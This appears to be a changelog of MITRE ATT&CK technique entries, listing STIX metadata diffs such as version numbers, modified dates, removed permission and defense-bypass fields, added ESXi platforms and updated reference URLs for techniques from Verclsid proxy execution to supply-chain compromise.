| x_mitre_platforms | | ESXi |
[T1218.012] System Binary Proxy Execution: Verclsid
Current version: 2.1
Version changed from: 2.0 → 2.1
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Application control', 'Digital Certificate Validation'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-05-20 17:35:28.221000+00:00 | 2025-04-15 19:58:46.323000+00:00 |
| external_references[5]['description'] | verclsid-exe. (2019, December 17). verclsid.exe File Information - What is it & How to Block . Retrieved August 10, 2020. | verclsid-exe. (2019, December 17). verclsid.exe File Information - What is it & How to Block . Retrieved November 17, 2024. |
| external_references[5]['url'] | https://www.winosbite.com/verclsid-exe/ | https://winosbite.com/verclsid-exe/ |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 2.0 | 2.1 |
[T1125] Video Capture
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-30 21:01:37.205000+00:00 | 2025-04-16 20:37:17.864000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.1 | 1.2 |
[T1497] Virtualization/Sandbox Evasion
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Anti-virus', 'Host forensic analysis', 'Signature-based detection', 'Static File Analysis'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-12 15:50:18.049000+00:00 | 2025-04-15 19:58:47.123000+00:00 |
| x_mitre_version | 1.3 | 1.4 |
[T1059.005] Command and Scripting Interpreter: Visual Basic
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_remote_support | False | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 16:43:27.104000+00:00 | 2025-04-15 19:59:14.314000+00:00 |
| x_mitre_version | 1.4 | 1.5 |
[T1600] Weaken Encryption
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Encryption'] | |
| x_mitre_permissions_required | ['Administrator'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-10-21 22:37:49.258000+00:00 | 2025-04-15 19:58:12.571000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_platforms[0] | Network | Network Devices |
[T1056.003] Input Capture: Web Portal Capture
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_system_requirements | ['An externally facing login portal is configured.'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 16:43:43.849000+00:00 | 2025-04-15 19:58:38.649000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
[T1071.001] Application Layer Protocol: Web Protocols
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-16 12:28:21.234000+00:00 | 2025-04-15 19:59:14.227000+00:00 |
| x_mitre_version | 1.3 | 1.4 |
| x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1102] Web Service
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-07 17:53:54.380000+00:00 | 2025-04-15 19:58:47.211000+00:00 |
| x_mitre_version | 1.2 | 1.3 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1583.006] Acquire Infrastructure: Web Services
Current version: 1.3
Version changed from: 1.2 → 1.3
|
|
|---|
| t | Adversaries may register for web services that can be used d | t | Adversaries may register for web services that can be used d |
| uring targeting. A variety of popular websites exist for adv | | uring targeting. A variety of popular websites exist for adv |
| ersaries to register for a web-based service that can be abu | | ersaries to register for a web-based service that can be abu |
| sed during later stages of the adversary lifecycle, such as | | sed during later stages of the adversary lifecycle, such as |
| during Command and Control ([Web Service](https://attack.mit | | during Command and Control ([Web Service](https://attack.mit |
| re.org/techniques/T1102)), [Exfiltration Over Web Service](h | | re.org/techniques/T1102)), [Exfiltration Over Web Service](h |
| ttps://attack.mitre.org/techniques/T1567), or [Phishing](htt | | ttps://attack.mitre.org/techniques/T1567), or [Phishing](htt |
| ps://attack.mitre.org/techniques/T1566). Using common servic | | ps://attack.mitre.org/techniques/T1566). Using common servic |
| es, such as those offered by Google or Twitter, makes it eas | | es, such as those offered by Google, GitHub, or Twitter, mak |
| ier for adversaries to hide in expected noise.(Citation: Fir | | es it easier for adversaries to hide in expected noise.(Cita |
| eEye APT29) By utilizing a web service, adversaries can make | | tion: FireEye APT29)(Citation: Hacker News GitHub Abuse 2024 |
| it difficult to physically tie back operations to them. | | ) By utilizing a web service, adversaries can make it diffic |
| | | ult to physically tie back operations to them. |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-01-16 22:47:59.395000+00:00 | 2025-04-15 19:58:49.217000+00:00 |
| description | Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)), [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567), or [Phishing](https://attack.mitre.org/techniques/T1566). Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise.(Citation: FireEye APT29) By utilizing a web service, adversaries can make it difficult to physically tie back operations to them. | Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)), [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567), or [Phishing](https://attack.mitre.org/techniques/T1566). Using common services, such as those offered by Google, GitHub, or Twitter, makes it easier for adversaries to hide in expected noise.(Citation: FireEye APT29)(Citation: Hacker News GitHub Abuse 2024) By utilizing a web service, adversaries can make it difficult to physically tie back operations to them. |
| external_references[1]['description'] | FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved September 17, 2015. | FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved November 17, 2024. |
| external_references[1]['url'] | https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf | https://services.google.com/fh/files/misc/rpt-apt29-hammertoss-stealthy-tactics-define-en.pdf |
| x_mitre_version | 1.2 | 1.3 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'Hacker News GitHub Abuse 2024', 'description': "Dvir Sasson. (2024, May 13). GitHub Abuse Flaw Shows Why We Can't Shrug Off Abuse Vulnerabilities in Security. Retrieved March 31, 2025.", 'url': 'https://thehackernews.com/expert-insights/2024/05/github-abuse-flaw-shows-why-we-cant.html'} |
| x_mitre_contributors | | Dvir Sasson, Reco |
[T1550.004] Use Alternate Authentication Material: Web Session Cookie
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['System Access Controls'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 16:11:15.657000+00:00 | 2025-04-15 19:59:05.730000+00:00 |
| x_mitre_version | 1.4 | 1.5 |
[T1505.003] Server Software Component: Web Shell
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-16 12:45:06.434000+00:00 | 2025-04-15 19:58:34.688000+00:00 |
| x_mitre_version | 1.4 | 1.5 |
| x_mitre_platforms[3] | Network | Network Devices |
[T1059.003] Command and Scripting Interpreter: Windows Command Shell
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_remote_support | True | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 15:19:56.540000+00:00 | 2025-04-15 19:59:10.209000+00:00 |
| x_mitre_version | 1.4 | 1.5 |
[T1047] Windows Management Instrumentation
Current version: 1.6
Version changed from: 1.5 → 1.6
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_remote_support | True | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 15:20:57.328000+00:00 | 2025-04-15 19:58:01.648000+00:00 |
| x_mitre_version | 1.5 | 1.6 |
[T1546.003] Event Triggered Execution: Windows Management Instrumentation Event Subscription
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['Administrator', 'SYSTEM'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-13 14:08:20.882000+00:00 | 2025-04-15 19:58:50.950000+00:00 |
| external_references[3]['description'] | Devon Kerr. (2015). There's Something About WMI. Retrieved May 4, 2020. | Devon Kerr. (2015). There's Something About WMI. Retrieved November 17, 2024. |
| external_references[3]['url'] | https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf | https://web.archive.org/web/20221203203722/https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf |
| external_references[6]['description'] | Mandiant. (2015, February 24). M-Trends 2015: A View from the Front Lines. Retrieved May 18, 2016. | Mandiant. (2015, February 24). M-Trends 2015: A View from the Front Lines. Retrieved November 17, 2024. |
| external_references[6]['url'] | https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf | https://web.archive.org/web/20160629094859/https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf |
| x_mitre_version | 1.4 | 1.5 |
[T1543.003] Create or Modify System Process: Windows Service
Current version: 1.6
Version changed from: 1.5 → 1.6
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_effective_permissions | ['Administrator', 'SYSTEM'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-11 19:25:51.394000+00:00 | 2025-04-15 19:58:16.076000+00:00 |
| x_mitre_version | 1.5 | 1.6 |
[T1547.004] Boot or Logon Autostart Execution: Winlogon Helper DLL
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['SYSTEM', 'Administrator'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-02-14 21:24:37.780000+00:00 | 2025-04-15 19:58:37.982000+00:00 |
| external_references[1]['description'] | Langendorf, S. (2013, September 24). Windows Registry Persistence, Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018. | Langendorf, S. (2013, September 24). Windows Registry Persistence, Part 2: The Run Keys and Search-Order. Retrieved November 17, 2024. |
| external_references[1]['url'] | https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order | https://web.archive.org/web/20160214140250/http://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order |
| x_mitre_version | 1.2 | 1.3 |
[T1547.013] Boot or Logon Autostart Execution: XDG Autostart Entries
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['User', 'root'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-16 16:35:12.501000+00:00 | 2025-04-15 19:59:14.885000+00:00 |
| external_references[2]['description'] | Free Desktop. (2017, December 24). Recognized Desktop Entry Keys. Retrieved September 12, 2019. | Free Desktop. (2017, December 24). Recognized Desktop Entry Keys. Retrieved November 17, 2024. |
| external_references[2]['url'] | https://specifications.freedesktop.org/desktop-entry-spec/1.2/ar01s06.html | https://specifications.freedesktop.org/desktop-entry-spec/latest/recognized-keys.html |
| x_mitre_version | 1.1 | 1.2 |
[T1559.003] Inter-Process Communication: XPC Services
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_remote_support | False | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-16 16:14:12.793000+00:00 | 2025-04-15 19:58:47.031000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
[T1220] XSL Script Processing
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Anti-virus', 'Digital Certificate Validation', 'Application Control'] | |
| x_mitre_system_requirements | ['Microsoft Core XML Services (MSXML) or access to wmic.exe'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-12 19:40:12.337000+00:00 | 2025-04-15 19:59:19.125000+00:00 |
| x_mitre_version | 1.2 | 1.3 |
Patches
[T1557.002] Adversary-in-the-Middle: ARP Cache Poisoning
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-07-22 18:37:22.176000+00:00 | 2025-04-15 21:43:10.406000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1650] Acquire Access
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-14 20:04:42.893000+00:00 | 2025-04-15 21:43:51.840000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1583] Acquire Infrastructure
Current version: 1.4
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-16 20:03:59.884000+00:00 | 2025-04-15 21:44:09.753000+00:00 |
| external_references[7]['description'] | Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved October 12, 2021. | Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved November 17, 2024. |
| external_references[7]['url'] | https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation | https://cloud.google.com/blog/topics/threat-intelligence/scandalous-external-detection-using-network-scan-data-and-automation/ |
[T1595] Active Scanning
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-03-08 20:58:13.661000+00:00 | 2025-04-15 21:44:26.959000+00:00 |
[T1137.006] Office Application Startup: Add-ins
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 15:37:09.190000+00:00 | 2025-04-15 21:45:27.400000+00:00 |
| external_references[1]['description'] | Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail! Enterprise Email Compromise. Retrieved April 22, 2019. | Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail! Enterprise Email Compromise. Retrieved November 17, 2024. |
| external_references[1]['url'] | https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf | https://web.archive.org/web/20190508170121/https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf |
| external_references[2]['description'] | Knowles, W. (2017, April 21). Add-In Opportunities for Office Persistence. Retrieved July 3, 2017. | Knowles, W. (2017, April 21). Add-In Opportunities for Office Persistence. Retrieved November 17, 2024. |
| external_references[2]['url'] | https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/ | https://web.archive.org/web/20190526112859/https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/ |
[T1098.001] Account Manipulation: Additional Cloud Credentials
Current version: 2.8
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 21:45:50.674000+00:00 |
[T1098.003] Account Manipulation: Additional Cloud Roles
Current version: 2.5
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 21:46:09.054000+00:00 |
[T1098.006] Account Manipulation: Additional Container Cluster Roles
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-16 17:51:35.865000+00:00 | 2025-04-15 21:46:31.661000+00:00 |
[T1098.002] Account Manipulation: Additional Email Delegate Permissions
Current version: 2.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 15:37:25.303000+00:00 | 2025-04-15 21:47:23.761000+00:00 |
| external_references[1]['description'] | Bienstock, D.. (2019). BECS and Beyond: Investigating and Defending O365. Retrieved September 13, 2019. | Bienstock, D.. (2019). BECS and Beyond: Investigating and Defending O365. Retrieved November 17, 2024. |
| external_references[1]['url'] | https://www.slideshare.net/DouglasBienstock/shmoocon-2019-becs-and-beyond-investigating-and-defending-office-365 | https://www.slideshare.net/slideshow/shmoocon-2019-becs-and-beyond-investigating-and-defending-office-365/128744511 |
| external_references[5]['description'] | Mandiant. (2018). Mandiant M-Trends 2018. Retrieved July 9, 2018. | Mandiant. (2018). Mandiant M-Trends 2018. Retrieved November 17, 2024. |
| external_references[5]['url'] | https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf | https://static.carahsoft.com/concrete/files/1015/2779/3571/M-Trends-2018-Report.pdf |
[T1098.007] Account Manipulation: Additional Local or Domain Groups
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-14 14:32:08.926000+00:00 | 2025-04-15 21:47:40.787000+00:00 |
[T1574.014] Hijack Execution Flow: AppDomainManager
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-28 15:44:25.342000+00:00 | 2025-04-15 21:48:08.401000+00:00 |
[T1499.003] Endpoint Denial of Service: Application Exhaustion Flood
Current version: 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 15:41:49.168000+00:00 | 2025-04-15 21:48:39.804000+00:00 |
[T1010] Application Window Discovery
Current version: 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 16:22:56.372000+00:00 | 2025-04-15 21:49:50.019000+00:00 |
[T1499.004] Endpoint Denial of Service: Application or System Exploitation
Current version: 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 15:42:23.001000+00:00 | 2025-04-15 21:50:12.334000+00:00 |
[T1560] Archive Collected Data
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-01-20 00:07:58.958000+00:00 | 2025-04-15 21:50:30.319000+00:00 |
| external_references[1]['description'] | Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018. | Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved November 17, 2024. |
| external_references[1]['url'] | https://www.justice.gov/file/1080281/download | https://cdn.cnn.com/cnn/2018/images/07/13/gru.indictment.pdf |
[T1560.003] Archive Collected Data: Archive via Custom Method
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-25 22:48:14.605000+00:00 | 2025-04-15 21:50:49.814000+00:00 |
[T1560.002] Archive Collected Data: Archive via Library
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-29 18:27:30.891000+00:00 | 2025-04-15 21:51:09.003000+00:00 |
[T1560.001] Archive Collected Data: Archive via Utility
Current version: 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-15 19:02:53.995000+00:00 | 2025-04-15 21:51:23.078000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1123] Audio Capture
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 13:39:22.774000+00:00 | 2025-04-15 21:51:52.461000+00:00 |
[T1496.002] Resource Hijacking: Bandwidth Hijacking
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-25 14:59:35.287000+00:00 | 2025-04-15 21:52:31.979000+00:00 |
[T1552.003] Unsecured Credentials: Bash History
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-12 15:24:04.912000+00:00 | 2025-04-15 21:52:49.389000+00:00 |
[T1584.005] Compromise Infrastructure: Botnet
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-19 15:55:58.319000+00:00 | 2025-04-16 13:38:12.734000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1036.009] Masquerading: Break Process Trees
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-03 04:06:42.256000+00:00 | 2025-04-15 21:54:02.243000+00:00 |
[T1217] Browser Information Discovery
Current version: 2.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-16 14:24:40.625000+00:00 | 2025-04-15 21:54:16.719000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1612] Build Image on Host
Current version: 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-15 16:22:09.807000+00:00 | 2025-04-15 21:54:42.589000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1591.002] Gather Victim Org Information: Business Relationships
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-15 03:36:58.964000+00:00 | 2025-04-15 21:54:59.306000+00:00 |
[T1596.004] Search Open Technical Databases: CDNs
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-15 03:47:55.905000+00:00 | 2025-04-15 21:55:21.053000+00:00 |
[T1003.005] OS Credential Dumping: Cached Domain Credentials
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 14:18:59.123000+00:00 | 2025-04-15 21:55:45.923000+00:00 |
[T1558.005] Steal or Forge Kerberos Tickets: Ccache Files
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-14 21:26:37.856000+00:00 | 2025-04-15 21:56:03.788000+00:00 |
[T1552.008] Unsecured Credentials: Chat Messages
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 21:56:22.979000+00:00 |
[T1070.002] Indicator Removal: Clear Linux or Mac System Logs
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-29 21:23:51.886000+00:00 | 2025-04-15 21:56:45.103000+00:00 |
[T1070.008] Indicator Removal: Clear Mailbox Data
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 15:43:56.839000+00:00 | 2025-04-15 21:56:59.810000+00:00 |
[T1592.004] Gather Victim Host Information: Client Configurations
Current version: 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-17 16:35:09.668000+00:00 | 2025-04-15 21:57:34.604000+00:00 |
[T1115] Clipboard Data
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-14 21:51:47.277000+00:00 | 2025-04-15 21:57:50.289000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1087.004] Account Discovery: Cloud Account
Current version: 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 15:51:18.808000+00:00 | 2025-04-15 22:00:56.981000+00:00 |
[T1136.003] Create Account: Cloud Account
Current version: 1.6
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 22:01:16.589000+00:00 |
[T1585.003] Establish Accounts: Cloud Accounts
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-25 15:49:14.785000+00:00 | 2025-04-15 22:01:31.837000+00:00 |
| x_mitre_attack_spec_version | 3.0.0 | 3.2.0 |
[T1586.003] Compromise Accounts: Cloud Accounts
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-16 21:26:36.312000+00:00 | 2025-04-15 22:01:54.640000+00:00 |
[T1069.003] Permission Groups Discovery: Cloud Groups
Current version: 1.5
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 15:51:35.759000+00:00 | 2025-04-15 22:02:13.319000+00:00 |
[T1580] Cloud Infrastructure Discovery
Current version: 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-30 13:28:37.415000+00:00 | 2025-04-15 22:02:30.057000+00:00 |
| external_references[8]['description'] | Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020. | Mandiant. (2020, February). M-Trends 2020. Retrieved November 17, 2024. |
[T1552.005] Unsecured Credentials: Cloud Instance Metadata API
Current version: 1.4
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 16:24:20.219000+00:00 | 2025-04-15 22:02:45.218000+00:00 |
[T1555.006] Credentials from Password Stores: Cloud Secrets Management Stores
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 14:20:16.722000+00:00 | 2025-04-15 22:03:00.834000+00:00 |
[T1526] Cloud Service Discovery
Current version: 1.4
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 22:03:24.903000+00:00 |
[T1496.004] Resource Hijacking: Cloud Service Hijacking
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-16 17:59:27.535000+00:00 | 2025-04-15 22:03:40.356000+00:00 |
[T1021.007] Remote Services: Cloud Services
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 15:52:47.255000+00:00 | 2025-04-15 22:03:56.494000+00:00 |
[T1619] Cloud Storage Object Discovery
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-11 22:29:43.677000+00:00 | 2025-04-15 22:04:12.682000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1593.003] Search Open Websites/Domains: Code Repositories
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-26 18:01:20.520000+00:00 | 2025-04-15 22:04:43.188000+00:00 |
| x_mitre_attack_spec_version | 3.0.0 | 3.2.0 |
[T1213.003] Data from Information Repositories: Code Repositories
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-04 13:03:54.101000+00:00 | 2025-04-15 22:04:59.867000+00:00 |
[T1587.002] Develop Capabilities: Code Signing Certificates
Current version: 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-17 16:07:08.549000+00:00 | 2025-04-15 22:05:55.035000+00:00 |
[T1588.003] Obtain Capabilities: Code Signing Certificates
Current version: 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-17 16:19:50.018000+00:00 | 2025-04-15 22:05:19.685000+00:00 |
[T1027.010] Obfuscated Files or Information: Command Obfuscation
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-12 19:43:18.873000+00:00 | 2025-04-15 22:06:13.992000+00:00 |
[T1092] Communication Through Removable Media
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-01-31 03:17:42.004000+00:00 | 2025-04-15 22:06:39.028000+00:00 |
[T1586] Compromise Accounts
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-11 01:08:56.774000+00:00 | 2025-04-15 22:07:30.871000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1195.003] Supply Chain Compromise: Compromise Hardware Supply Chain
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-28 16:05:10.755000+00:00 | 2025-04-15 22:07:50.636000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1195.001] Supply Chain Compromise: Compromise Software Dependencies and Development Tools
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-13 14:47:31.204000+00:00 | 2025-04-15 22:08:13.223000+00:00 |
